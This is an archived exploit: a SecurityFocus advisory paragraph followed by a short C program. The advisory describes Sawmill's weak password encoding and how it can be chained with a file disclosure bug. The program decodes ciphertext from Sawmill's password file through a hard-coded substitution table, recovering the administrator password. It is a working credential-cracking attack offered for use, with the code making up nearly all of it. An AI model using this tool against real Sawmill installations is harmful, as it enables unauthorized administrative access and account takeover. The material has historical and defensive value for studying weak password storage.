41 lines
No EOL
1 KiB
C
41 lines
No EOL
1 KiB
C
// source: https://www.securityfocus.com/bid/1403/info
|
|
|
|
Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. This combined with the file disclosure vulnerability in Sawmill (bid = 1402) could allow an attacker to read the contents of sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities.
|
|
|
|
/*Decrypt password for Sawmill admin account.
|
|
|
|
Larry W. Cashdollar
|
|
lwc@vapid.betteros.org
|
|
http://vapid.betteros.org
|
|
usage ./decrypt cyphertext
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
|
|
|
|
char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
|
|
char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
|
|
|
|
int
|
|
main (int argc, char **argv)
|
|
{
|
|
|
|
int x, y;
|
|
char cypher[128];
|
|
|
|
strncpy (cypher, argv[1], 128);
|
|
|
|
for (x = 0; x < strlen (cypher); x++)
|
|
{
|
|
|
|
for (y = 0; y < strlen (encode); y++)
|
|
if (cypher[x] == encode[y])
|
|
printf ("%c", alpha[y]);
|
|
|
|
}
|
|
|
|
printf("\n\"+\" could also be a space [ ]\n");
|
|
|
|
} |